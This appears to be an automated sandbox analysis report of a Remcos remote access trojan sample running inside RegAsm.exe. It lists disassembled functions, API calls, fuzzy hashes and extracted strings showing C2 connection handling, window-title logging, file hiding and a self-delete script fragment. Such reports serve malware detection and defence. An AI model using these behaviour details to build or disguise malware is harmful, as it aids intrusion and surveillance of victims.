                                                                Similarity
                                                                • API ID: Name$ComputerUser
                                                                • String ID:
                                                                • API String ID: 4229901323-0
                                                                • Opcode ID: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                                                                • Instruction ID: 8360233331794fbd8bccde093e114755ab2a7c2896376219b9d5f45c8fb32f7b
                                                                • Opcode Fuzzy Hash: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                                                                • Instruction Fuzzy Hash: 90014F7190011CABCB01EBD1DC45EEDB7BCAF44309F10016AB505B21A1EFB46E88CBA8
                                                                Function 00426D42 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: recv
                                                                • String ID:
                                                                • API String ID: 1507349165-0
                                                                • Opcode ID: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                                                                • Instruction ID: c63eaffdb417a6470c671315a396a42075a312041b5b8b5670d44767818a4bbd
                                                                • Opcode Fuzzy Hash: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                                                                • Instruction Fuzzy Hash: 26B09279108202FFCA150B60CC0886ABEA6ABC8382B00882DB586411B0C736C851AB26
                                                                Function 0040EA00 Relevance: 86.5, APIs: 15, Strings: 34, Instructions: 795COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 5 40ea00-40ea82 call 41cbe1 GetModuleFileNameW call 40f3fe call 4020f6 * 2 call 41beac call 40fb52 call 401e8d call 43fd50 22 40ea84-40eac9 call 40fbee call 401e65 call 401fab call 410f72 call 40fb9f call 40f3eb 5->22 23 40eace-40eb96 call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->23 49 40ef2d-40ef3e call 401fd8 22->49 69 40eb98-40ebe3 call 406c59 call 401fe2 call 401fd8 call 401fab call 413584 23->69 70 40ebe9-40ec04 call 401e65 call 40b9f8 23->70 69->70 100 40f38a-40f3a5 call 401fab call 4139e4 call 4124b0 69->100 79 40ec06-40ec25 call 401fab call 413584 70->79 80 40ec3e-40ec45 call 40d0a4 70->80 79->80 99 40ec27-40ec3d call 401fab call 4139e4 79->99 88 40ec47-40ec49 80->88 89 40ec4e-40ec55 80->89 93 40ef2c 88->93 94 40ec57 89->94 95 40ec59-40ec65 call 41b354 89->95 93->49 94->95 104 40ec67-40ec69 95->104 105 40ec6e-40ec72 95->105 99->80 126 40f3aa-40f3db call 41bcef call 401f04 call 413a5e call 401f09 * 2 100->126 104->105 108 40ecb1-40ecc4 call 401e65 call 401fab 105->108 109 40ec74 call 407751 105->109 127 40ecc6 call 407790 108->127 128 40eccb-40ed53 call 401e65 call 41bcef call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 108->128 117 40ec79-40ec7b 109->117 120 40ec87-40ec9a call 401e65 call 401fab 117->120 121 40ec7d-40ec82 call 407773 call 40729b 117->121 120->108 141 40ec9c-40eca2 120->141 121->120 156 40f3e0-40f3ea call 40dd7d call 414f65 126->156 127->128 177 40ed55-40ed6e call 401e65 call 401fab call 43bb56 128->177 178 40edbb-40edbf 128->178 141->108 144 40eca4-40ecaa 141->144 144->108 147 40ecac call 40729b 144->147 147->108 177->178 204 40ed70-40edb6 call 401e65 call 401fab call 401e65 call 401fab call 40da6f call 401f13 call 401f09 177->204 180 40ef41-40efa1 call 436f10 call 40247c call 401fab * 2 call 413733 call 409092 178->180 181 40edc5-40edcc 178->181 234 40efa6-40effa call 401e65 call 401fab call 402093 call 401fab call 4137aa call 401e65 call 401fab call 43bb2c 180->234 183 40ee4a-40ee54 call 409092 181->183 184 40edce-40ee48 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40ce34 181->184 190 40ee59-40ee7d call 40247c call 434829 183->190 184->190 211 40ee8c 190->211 212 40ee7f-40ee8a call 436f10 190->212 204->178 217 40ee8e-40eed9 call 401f04 call 43f859 call 40247c call 401fab call 40247c call 401fab call 413982 211->217 212->217 272 40eede-40ef03 call 434832 call 401e65 call 40b9f8 217->272 286 40f017-40f019 234->286 287 40effc 234->287 272->234 288 40ef09-40ef28 call 401e65 call 41bcef call 40f4af 272->288 290 40f01b-40f01d 286->290 291 40f01f 286->291 289 40effe-40f015 call 41ce2c CreateThread 287->289 288->234 306 40ef2a 288->306 295 40f025-40f101 call 402093 * 2 call 41b580 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409e1f call 401e65 call 401fab 289->295 290->289 291->295 344 40f103-40f13a call 43455e call 401e65 call 401fab CreateThread 295->344 345 40f13c 295->345 306->93 346 40f13e-40f156 call 401e65 call 401fab 344->346 345->346 357 40f194-40f1a7 call 401e65 call 401fab 346->357 358 40f158-40f18f call 43455e call 401e65 call 401fab CreateThread 346->358 367 40f207-40f21a call 401e65 call 401fab 357->367 368 40f1a9-40f202 call 401e65 call 401fab call 401e65 call 401fab call 40da23 call 401f13 call 401f09 CreateThread 357->368 358->357 379 40f255-40f279 call 41b69e call 401f13 call 401f09 367->379 380 40f21c-40f250 call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 40c19d 367->380 368->367 400 40f27b-40f27c SetProcessDEPPolicy 379->400 401 40f27e-40f291 CreateThread 379->401 380->379 400->401 405 40f293-40f29d CreateThread 401->405 406 40f29f-40f2a6 401->406 405->406 410 40f2b4-40f2bb 406->410 411 40f2a8-40f2b2 CreateThread 406->411 412 40f2c9 410->412 413 40f2bd-40f2c0 410->413 411->410 418 40f2ce-40f302 call 402093 call 4052fd call 402093 call 41b580 call 401fd8 412->418 415 40f2c2-40f2c7 413->415 416 40f307-40f31a call 401fab call 41353a 413->416 415->418 425 40f31f-40f322 416->425 418->416 425->156 427 40f328-40f368 call 41bcef call 401f04 call 413656 call 401f09 call 401f04 425->427 443 40f381-40f386 DeleteFileW 427->443 444 40f388 443->444 445 40f36a-40f36d 443->445 444->126 445->126 446 40f36f-40f37c Sleep call 401f04 445->446 446->443
                                                                APIs
                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CBF6
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CBFF
                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC19
                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC2B
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC2E
                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC3F
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC42
                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040EA1C), ref: 0041CC54
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC57
                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040EA1C), ref: 0041CC63
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC66
                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC7A
                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC8E
                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040EA1C), ref: 0041CC9F
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCA2
                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCB6
                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCCA
                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCDE
                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCF2
                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CD06
                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040EA1C), ref: 0041CD14
                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 0040EA29
                                                                  • Part of subcall function 00410F72: __EH_prolog.LIBCMT ref: 00410F77
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                • String ID: SG$ SG$8SG$8SG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Exe$Inj$PSG$Remcos Agent initialized$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                                                                • API String ID: 2830904901-3701325316
                                                                • Opcode ID: f24b5bd9f3459d3669a1f878c7b82d09cabcf15966132de46c6c98d6573edd9d
                                                                • Instruction ID: f870588dacc207cf398a21a9077505b2b75b96970711a81e27f166ce8512e3fa
                                                                • Opcode Fuzzy Hash: f24b5bd9f3459d3669a1f878c7b82d09cabcf15966132de46c6c98d6573edd9d
                                                                • Instruction Fuzzy Hash: 9B32F960B043412BDA24B7729C57B7E26994F80748F50483FB9467B2E3EEBC8D45839E
                                                                Function 00414F65 Relevance: 46.3, APIs: 5, Strings: 21, Instructions: 809sleepnetworkCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 448 414f65-414fad call 4020df call 41b944 call 4020df call 401e65 call 401fab call 43bb2c 461 414fbc-415008 call 402093 call 401e65 call 4020f6 call 41beac call 40489e call 401e65 call 40b9f8 448->461 462 414faf-414fb6 Sleep 448->462 477 41500a-415079 call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 40473d 461->477 478 41507c-415117 call 402093 call 401e65 call 4020f6 call 41beac call 401e65 * 2 call 406c59 call 402f10 call 401fe2 call 401fd8 * 2 call 401e65 call 405b05 461->478 462->461 477->478 531 415127-41512e 478->531 532 415119-415125 478->532 533 415133-4151c5 call 405aa6 call 40531e call 406383 call 402f10 call 402093 call 41b580 call 401fd8 * 2 call 401e65 call 401fab call 401e65 call 401fab call 414f24 531->533 532->533 560 415210-41521e call 40482d 533->560 561 4151c7-41520b WSAGetLastError call 41cb72 call 4052fd call 402093 call 41b580 call 401fd8 533->561 567 415220-415246 call 402093 * 2 call 41b580 560->567 568 41524b-415259 call 404f51 call 4048c8 560->568 584 415ade-415af0 call 404e26 call 4021fa 561->584 567->584 580 41525e-415260 568->580 583 415266-4153b9 call 401e65 * 2 call 40531e call 406383 call 402f10 call 406383 call 402f10 call 402093 call 41b580 call 401fd8 * 4 call 41b871 call 4145f8 call 409097 call 441ed1 call 401e65 call 4020f6 call 40247c call 401fab * 2 call 413733 580->583 580->584 648 4153bb-4153c8 call 405aa6 583->648 649 4153cd-4153f4 call 401fab call 4135e1 583->649 596 415af2-415b12 call 401e65 call 401fab call 43bb2c Sleep 584->596 597 415b18-415b20 call 401e8d 584->597 596->597 597->478 648->649 655 4153f6-4153f8 649->655 656 4153fb-415a51 call 40417e call 40ddc4 call 41bcd3 call 41bdaf call 41bc1f call 401e65 GetTickCount call 41bc1f call 41bb77 call 41bc1f * 2 call 41bb27 call 41bdaf * 5 call 40f90c call 41bdaf call 402f31 call 402ea1 call 402f10 call 402ea1 call 402f10 * 3 call 402ea1 call 402f10 call 406383 call 402f10 call 406383 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 406383 call 402f10 * 5 call 402ea1 call 402f10 call 402ea1 call 402f10 * 7 call 402ea1 call 404aa1 call 401fd8 * 50 call 401f09 call 401fd8 * 6 call 401f09 call 404c10 649->656 655->656 902 415a53-415a5a 656->902 903 415a65-415a6c 656->903 902->903 904 415a5c-415a5e 902->904 905 415a78-415aaa call 405a6b call 402093 * 2 call 41b580 903->905 906 415a6e-415a73 call 40b08c 903->906 904->903 917 415aac-415ab8 CreateThread 905->917 918 415abe-415ad9 call 401fd8 * 2 call 401f09 905->918 906->905 917->918 918->584
                                                                APIs
                                                                • Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414FB6
                                                                • WSAGetLastError.WS2_32(00000000,00000001), ref: 004151C7
                                                                • Sleep.KERNEL32(00000000,00000002), ref: 00415B12
                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Sleep$ErrorLastLocalTime
                                                                • String ID: | $%I64u$5.1.1 Pro$8SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$PSG$TLS Off$TLS On $dMG$hlight$name$NG$NG$PG$PG$PG
                                                                • API String ID: 524882891-3007660392
                                                                • Opcode ID: 36ae4ca0ddcce510b1f6f4c43d9f3cdffd11b7a3780b4b315adef822fefe3200
                                                                • Instruction ID: 9dea7478a43989413a8a7de35667e348ffff56bc780dedce428272fd6db975fd
                                                                • Opcode Fuzzy Hash: 36ae4ca0ddcce510b1f6f4c43d9f3cdffd11b7a3780b4b315adef822fefe3200
                                                                • Instruction Fuzzy Hash: B8526C31A001155ACB18F732DD96AFEB3769F90348F5044BFE40A761E2EF781E858A9D
                                                                Function 0040A761 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163sleepCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • Sleep.KERNEL32(00001388), ref: 0040A77B
                                                                  • Part of subcall function 0040A6B0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
                                                                  • Part of subcall function 0040A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                                  • Part of subcall function 0040A6B0: Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                                  • Part of subcall function 0040A6B0: CloseHandle.KERNEL32(00000000,?,?,?,0040A788), ref: 0040A729
                                                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A7B7
                                                                • GetFileAttributesW.KERNEL32(00000000), ref: 0040A7C8
                                                                • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7DF
                                                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A859
                                                                  • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                                • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466478,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A962
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                • String ID: 8SG$8SG$pQG$pQG$PG$PG
                                                                • API String ID: 3795512280-1152054767
                                                                • Opcode ID: fcc29488dd826d1e3e905d90cfd1e685e258c9bd02a7bd2fd8e0a043009058da
                                                                • Instruction ID: 2a79d88b44a8fc0b04dcb000ea34af81e4c48788ca5147296d011aa32960a087
                                                                • Opcode Fuzzy Hash: fcc29488dd826d1e3e905d90cfd1e685e258c9bd02a7bd2fd8e0a043009058da
                                                                • Instruction Fuzzy Hash: B6516E716043015ACB15BB72C866ABE77AA9F80349F00483FF646B71E2DF7C9D09865E
                                                                Function 004048C8 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 144networkCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1023 4048c8-4048e8 connect 1024 404a1b-404a1f 1023->1024 1025 4048ee-4048f1 1023->1025 1028 404a21-404a2f WSAGetLastError 1024->1028 1029 404a97 1024->1029 1026 404a17-404a19 1025->1026 1027 4048f7-4048fa 1025->1027 1030 404a99-404a9e 1026->1030 1031 404926-404930 call 420cf1 1027->1031 1032 4048fc-404923 call 40531e call 402093 call 41b580 1027->1032 1028->1029 1033 404a31-404a34 1028->1033 1029->1030 1045 404941-40494e call 420f20 1031->1045 1046 404932-40493c 1031->1046 1032->1031 1035 404a71-404a76 1033->1035 1036 404a36-404a6f call 41cb72 call 4052fd call 402093 call 41b580 call 401fd8 1033->1036 1038 404a7b-404a94 call 402093 * 2 call 41b580 1035->1038 1036->1029 1038->1029 1055 404950-404973 call 402093 * 2 call 41b580 1045->1055 1056 404987-404992 call 421ad1 1045->1056 1046->1038 1085 404976-404982 call 420d31 1055->1085 1069 4049c4-4049d1 call 420e97 1056->1069 1070 404994-4049c2 call 402093 * 2 call 41b580 call 421143 1056->1070 1082 4049d3-4049f6 call 402093 * 2 call 41b580 1069->1082 1083 4049f9-404a14 CreateEventW * 2 1069->1083 1070->1085 1082->1083 1083->1026 1085->1029
                                                                APIs
                                                                • connect.WS2_32(?,?,?), ref: 004048E0
                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                                                • WSAGetLastError.WS2_32 ref: 00404A21
                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                • API String ID: 994465650-2151626615
                                                                • Opcode ID: 45ff517fd2582d6e0a202418ab4ffabcdb2540000aed43e3d88e52077495edcf
                                                                • Instruction ID: 8b7d3ad86a52f8452b0ebae4faff6649d271d562dba2871a89d137605d3bb54b
                                                                • Opcode Fuzzy Hash: 45ff517fd2582d6e0a202418ab4ffabcdb2540000aed43e3d88e52077495edcf
                                                                • Instruction Fuzzy Hash: CE41E8B57506017BC61877BB890B52E7A56AB81308B50017FEA0256AD3FA7D9C108BEF
                                                                Function 00404E26 Relevance: 18.1, APIs: 12, Instructions: 65synchronizationCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                                                • closesocket.WS2_32(000000FF), ref: 00404E5A
                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                                                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                                                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBF
                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EC4
                                                                • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                                                                • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED6
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                • String ID:
                                                                • API String ID: 3658366068-0
                                                                • Opcode ID: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                                • Instruction ID: 681aebbacbf541c1c6cd6dfca6fba55586e42b113d9ea1c0d4e3a90daa9851ad
                                                                • Opcode Fuzzy Hash: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                                • Instruction Fuzzy Hash: DE21EA71154B04AFDB216B26DC49B1BBBA1FF40326F104A2DE2E211AF1CB79B851DB58
                                                                Function 0040AD11 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • __Init_thread_footer.LIBCMT ref: 0040AD73
                                                                • Sleep.KERNEL32(000001F4), ref: 0040AD7E
                                                                • GetForegroundWindow.USER32 ref: 0040AD84
                                                                • GetWindowTextLengthW.USER32(00000000), ref: 0040AD8D
                                                                • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040ADC1
                                                                • Sleep.KERNEL32(000003E8), ref: 0040AE8F
                                                                  • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                • String ID: [${ User has been idle for $ minutes }$]
                                                                • API String ID: 911427763-3954389425
                                                                • Opcode ID: 1d1453891d5a0c3fd18e7847a2101c1b07e014a2f3fd082d5303374a996e40ae
                                                                • Instruction ID: 479ab846abdc3ffa357cf8cfb056c4a9d7a1c57035fbb5610920680a3dc8d5cf
                                                                • Opcode Fuzzy Hash: 1d1453891d5a0c3fd18e7847a2101c1b07e014a2f3fd082d5303374a996e40ae
                                                                • Instruction Fuzzy Hash: 1251E2716043419BD714FB22D856AAE7795AF84308F10093FF986A22E2EF7C9D44C69F
                                                                Function 0040DA6F Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1195 40da6f-40da94 call 401f86 1198 40da9a 1195->1198 1199 40dbbe-40dbe4 call 401f04 GetLongPathNameW call 40417e 1195->1199 1201 40dae0-40dae7 call 41c048 1198->1201 1202 40daa1-40daa6 1198->1202 1203 40db93-40db98 1198->1203 1204 40dad6-40dadb 1198->1204 1205 40dba9 1198->1205 1206 40db9a-40dba7 call 43c11f 1198->1206 1207 40daab-40dab9 call 41b645 call 401f13 1198->1207 1208 40dacc-40dad1 1198->1208 1209 40db8c-40db91 1198->1209 1222 40dbe9-40dc56 call 40417e call 40de0c call 402fa5 * 2 call 401f09 * 5 1199->1222 1223 40dae9-40db39 call 40417e call 43c11f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1201->1223 1224 40db3b-40db87 call 40417e call 43c11f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1201->1224 1211 40dbae call 43c11f 1202->1211 1203->1211 1204->1211 1205->1211 1206->1205 1225 40dbb4-40dbb9 call 409092 1206->1225 1226 40dabe 1207->1226 1208->1211 1209->1211 1220 40dbb3 1211->1220 1220->1225 1231 40dac2-40dac7 call 401f09 1223->1231 1224->1226 1225->1199 1226->1231 1231->1199
                                                                APIs
                                                                • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040DBD5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LongNamePath
                                                                • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                • API String ID: 82841172-425784914
                                                                • Opcode ID: b8d894b691b3e00382c27ba12a86ce93fa8d51d86cdbf8ec607a257f19f9a43d
                                                                • Instruction ID: db29472287e64cad03ac4489520097095d7cef5d056ecb8d0020da3553efca3c
                                                                • Opcode Fuzzy Hash: b8d894b691b3e00382c27ba12a86ce93fa8d51d86cdbf8ec607a257f19f9a43d
                                                                • Instruction Fuzzy Hash: 0A4151715082019AC205F765DC96CAAB7B8AE90758F10053FB146B20E2FFBCAE4DC65B
                                                                Function 0041C482 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67fileCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1295 41c482-41c493 1296 41c495-41c498 1295->1296 1297 41c4ab-41c4b2 1295->1297 1298 41c4a1-41c4a9 1296->1298 1299 41c49a-41c49f 1296->1299 1300 41c4b3-41c4cc CreateFileW 1297->1300 1298->1300 1299->1300 1301 41c4d2-41c4d7 1300->1301 1302 41c4ce-41c4d0 1300->1302 1304 41c4f2-41c503 WriteFile 1301->1304 1305 41c4d9-41c4e7 SetFilePointer 1301->1305 1303 41c510-41c515 1302->1303 1306 41c505 1304->1306 1307 41c507-41c50e CloseHandle 1304->1307 1305->1304 1308 41c4e9-41c4f0 CloseHandle 1305->1308 1306->1307 1307->1303 1308->1302
                                                                APIs
                                                                • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466478,00000000,00000000,0040D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C4C1
                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C4DE
                                                                • CloseHandle.KERNEL32(00000000), ref: 0041C4EA
